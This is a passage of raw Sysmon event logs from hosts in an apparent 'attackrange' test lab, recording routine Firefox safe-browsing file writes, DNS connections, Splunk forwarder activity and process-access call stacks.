Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\except-flash-digest256.sbstoreMD5=D5D6B4D59B4AE4E2DE4B40D0DA083571,SHA256=000E3A78C72A210CA3B5417A3CDD294FBCE2A31661601C9D594C75CF2800571C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151480Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\content-track-digest256.vlpsetMD5=E72E6B0165636DAE364CC43097FCD4E9,SHA256=3FE594D286D351B102E94676FD8A91B8FA0B3FDDD151336DDCE8C9BA2CFCFB50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151479Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\content-track-digest256.sbstoreMD5=318288F5909637E0C3285C0942D72FF4,SHA256=F2BB9D40F7237C0E6D8EA96DFA2E864BD1264EB191C52BDBF16488D9466BC300,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151478Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpsetMD5=40165280FF1345B5241EC2A9D1DA2AF0,SHA256=F80BDD5341D8B1EE946E344E258EF2D35C3C0BB6B13EB7B3E6A77467DFA8B97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151477Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstoreMD5=B9556D03AFF392142AD5691D2F867310,SHA256=CFD3909B41C1EE3CBCB8B7D2B1378065E7D3B543FFF1F2FB7A4F25C5FF41722C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151476Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\block-flash-digest256.vlpsetMD5=130B9AC2BEEC5ADA274561105D81AE36,SHA256=7D99FEC08182A5B95D18D1569EDAA2C60C2AAFBD15A56D8882F22F3B395E6460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151475Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\block-flash-digest256.sbstoreMD5=9F6B331AA1E070DCFEED473E76CE56C3,SHA256=7DBBEA2DD387EEB85E1F56E02FC9989ACDE570CD43BFEF2C2A827093BA87DA6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151474Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpsetMD5=F7A173C65979416711FAFF47FADFBB44,SHA256=7F018CC32CF471750B6C5322E27E4F1C38097C414E7C6DC6AF9CF31E607431A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151473Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstoreMD5=5C71167AC9642FCF7752093F77FBBC89,SHA256=6714F7FBADCCB013DA1D8ECEFA6368A7D193E1F2460477F8AC304EDCF8637AA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151472Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpsetMD5=BFED06667174B0D03EE7F88A3DDC9A8C,SHA256=7AE5584755089D28C3A52DCF1EB86E62D4F2E377D61A7D549C6D4EBD53F39B26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151471Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.104{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstoreMD5=E6AAB64DC2799B4ECC6A6D18F86BD283,SHA256=D72FA31B50E9164371C5B7A3CCA257B99CE12D900FB07DEF942361D76299F5FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151470Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.103{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\analytics-track-digest256.vlpsetMD5=16E5F327975AC215E9EFA4A4FC5262F5,SHA256=4698D628493E91E42494C8343B7E6469DFC1BFB1F771258C2FB556E84EF314B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151469Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.102{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\analytics-track-digest256.sbstoreMD5=C3757E7620737B3B6500073B370852FE,SHA256=34B07244F673343E9AC1C775B455C0A60AA95439E83A70B0C6A24E504A88F4B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151468Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.101{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpsetMD5=DE0D88480C24350C59E1E9A3583DE0D1,SHA256=01BA9F0B913E04ED10BD7166796483DD4F72005F249D6EE68B12117BE4B5D3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151467Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.098{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151466Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.083{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\ads-track-digest256.vlpsetMD5=8D9E3EEEE577DCE4B0062413A081F9F2,SHA256=D0E3356B67A0BB9BD101D87FA6E23EC2699CC8A25564CD88076663DACF73A9CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151465Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.083{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\ads-track-digest256.sbstoreMD5=2CC22CF356532158115AB8A0851A9A80,SHA256=6B106FD00C6E27909C9779448E5BDA5FFB96FE2A6FF42636A662AB411D9906DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151464Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.083{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=0A6DA5B03C8CFE4F3D179E7B46DCB6FE,SHA256=611912EE59BDD09CC3CCEC08D4CFA703A0C7781862055115394E3F9BE0B93F83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151463Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.067{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151462Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.004{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=87832ABD850B359BA1F21BC561ED3388,SHA256=0407A505501B1923E897AFAF9A63BAC9F95366B9ED87AAA141F58CE8163547B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104949Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:14.369{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal61241- 354300x8000000000000000104948Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:14.369{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal53177- 354300x8000000000000000104947Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:14.365{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal63649- 23542300x8000000000000000104946Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:17.140{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE5FDD1D1B769D32BB81248DCFB4253C,SHA256=C3B29D11F2472F87B6F40B9D93353AC74B2D15D73CB36F82DA7FEF8779904411,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151521Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:17.751{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70C330785B7CA66BCE13009FB6753E03,SHA256=A386E5E538B14C3160A9506DBBB1FC6367E486DED94E0894EA4F888F29B20164,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151520Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:14.517{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exeWIN-HOST-14\Administratortcptruefalse10.0.1.15win-host-14.attackrange.local58403-false172.217.14.202sea30s01-in-f10.1e100.net443https 10341000x8000000000000000151519Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:17.567{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba 10341000x8000000000000000151518Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:17.567{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992 10341000x8000000000000000151517Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:17.399{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba|C:\Program Files\Mozilla Firefox\xul.dll+2d7fa7f 10341000x8000000000000000151516Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:17.399{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1 23542300x8000000000000000151515Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:17.367{39BD8DE3-269B-60CA-EA03-00000000D101}6156WIN-HOST-14\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6156.xml~RF17e9122.TMPMD5=400B39C52D00FF39E60B91C74A63733D,SHA256=75361EBE398182A3C87957C2D93EC97E3D4C1D9F04A67DFAA0AF23753BF512B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151514Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:17.283{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba 10341000x8000000000000000151513Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:17.283{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992 23542300x8000000000000000104950Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:18.524{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC83920D5D2E7A55D194BE6E77A3583C,SHA256=E10AA35EDD2A0F3EA28B50C948CA35156F5CD9EC9ED4F5D8F3D9CB17C6694237,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151532Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:18.766{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A788D22E0D89404967A0AF4F0D268FCC,SHA256=3D11AE5252AB0636F29A758E80BF7B3C6CDAB65F8F3516D6E7DD32F06E0BD573,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151531Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.918{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58404-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000151530Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:18.266{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151529Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:18.266{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151528Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:18.252{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla 